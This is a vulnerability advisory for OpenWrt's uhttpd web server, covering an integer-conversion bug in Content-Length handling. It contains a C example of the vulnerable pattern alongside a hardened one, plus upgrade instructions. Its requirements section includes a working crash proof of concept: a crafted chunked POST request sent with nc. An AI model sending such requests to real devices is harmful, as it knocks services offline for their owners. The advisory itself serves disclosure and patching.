CVSS2: 5 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

CVSS3: 7.5 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

EPSS: 0.001 Low
Percentile: 45.8%
DESCRIPTION
An invalid data access can be triggered with an HTTP POST request to a CGI script specifying both Transfer-Encoding: chunked and a large Content-Length which exceeds 2^31 and is interpreted as a signed negative number. The negative content length is assigned to r->content_length in client_parse_header and passed as a negative read length to ustream_consume in client_poll_post_data, which will set the internal ustream buffer pointer to an invalid address, causing out of bounds memory reads later on in the code flow.
A similar implicit unsigned to signed conversion happens when parsing chunk sizes emitted by a CGI program.
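The conversion the description relies on, shown as an added example that is not uhttpd's code: a naive parser that stores the unsigned result of strtoul into a signed int field next to a hardened parser that rejects a sign character, overflow, trailing junk and any value that would not fit the signed field. The struct request type and both function names are hypothetical stand-ins for the r->content_length field the advisory names; the sample inputs are constructed.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical stand-in for the request struct whose int content_length field the advisory names. */
struct request {
    int content_length;
};

/* Vulnerable pattern: unsigned parse result stored into a signed int, so 2^31 and above
 * wrap negative (implementation-defined, but what common compilers do). */
int parse_content_length_naive(struct request *r, const char *value)
{
    r->content_length = (int)strtoul(value, NULL, 10);
    return 0;
}

/* Hardened pattern: reject a sign, overflow, trailing junk and anything that does not fit
 * the signed field before storing it. Caller is assumed to have stripped whitespace. */
int parse_content_length_checked(struct request *r, const char *value)
{
    char *end;
    unsigned long long len;

    if (value[0] < '0' || value[0] > '9')  /* rejects "", "-100000", "+1" */
        return -1;
    errno = 0;
    len = strtoull(value, &end, 10);
    if (errno == ERANGE || *end != '\0')   /* overflow or trailing garbage */
        return -1;
    if (len > INT_MAX)                     /* would turn negative in an int */
        return -1;
    r->content_length = (int)len;
    return 0;
}

int main(void)
{
    struct request r = { 0 };
    const char *inputs[] = { "-100000", "2147483648", "2147483647" }; /* constructed */
    for (int i = 0; i < 3; i++) {
        parse_content_length_naive(&r, inputs[i]);
        printf("%-11s naive=%d checked=%s\n", inputs[i], r.content_length,
               parse_content_length_checked(&r, inputs[i]) == 0 ? "accepted" : "rejected");
    }
    return 0;
}
```

The same range check applies to chunk sizes read back from a CGI program, which the description notes go through the same implicit conversion.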
REQUIREMENTS
In order to exploit this vulnerability, a malicious attacker would need to send a specially crafted HTTP POST request to uhttpd, something like the following:
$ cat crash.poc # crlf line endings, ends with 3 line endings
POST /cgi-bin/luci HTTP/1.0
Transfer-Encoding: chunked
Content-Length: -100000
$ ./uhttpd -f -p 127.0.0.1:8000 & # start uhttpd
$ nc 127.0.0.1 8000 < crash.poc # send POC to uhttpd
[1]+ Segmentation fault (core dumped)
MITIGATIONS
To fix this issue, update the affected uhttpd package using the command below.
opkg update; opkg upgrade uhttpd
The fix is contained in the following and later versions:
OpenWrt master: 2019-12-22 reboot-11760-gf34f9a414dd3
OpenWrt 19.07: 2019-12-22 v19.07.0-rc2-32-g414ea309271e
OpenWrt 18.06: 2019-12-22 v18.06.5-40-gb90156361152
AFFECTED VERSIONS
To our knowledge, OpenWrt versions 18.06.0 to 18.06.5 are affected. The fixed packages are integrated in the OpenWrt 18.06.6, OpenWrt 19.07.0 and subsequent releases. Older versions of OpenWrt (e.g. OpenWrt 15.05 and LEDE 17.01) are end of life and not supported any more.
CREDITS
The issue was discovered by Jan-Niklas Sohn and fixed by Jo-Philipp Wich.